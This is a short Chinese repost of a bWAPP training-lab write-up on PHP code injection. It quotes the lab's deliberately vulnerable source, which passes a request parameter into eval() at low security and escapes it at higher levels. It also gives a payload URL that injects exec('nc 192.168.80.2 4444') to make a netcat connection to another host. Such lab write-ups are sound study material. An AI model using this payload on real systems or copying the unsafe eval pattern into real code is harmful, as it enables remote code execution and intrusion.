当前位置: 代码迷 >> 综合 >> bWAPP--PHP Code Injection
  详细解决方案

bWAPP--PHP Code Injection

热度:77   发布时间:2024-02-20 05:36:54.0

bWAPP–PHP Code Injection

?

<?phpif(isset($_REQUEST["message"]))
{
    // If the security level is not MEDIUM or HIGHif($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2"){
    ?><p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>
  • low

    http://127.0.0.1/phpi.php?message=exec("nc 192.168.80.2 4444")
    
  • mid/high

    无法绕过

    <?php}// If the security level is MEDIUM or HIGHelse{
          
    ?><p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p><?php}}?>
    
  相关解决方案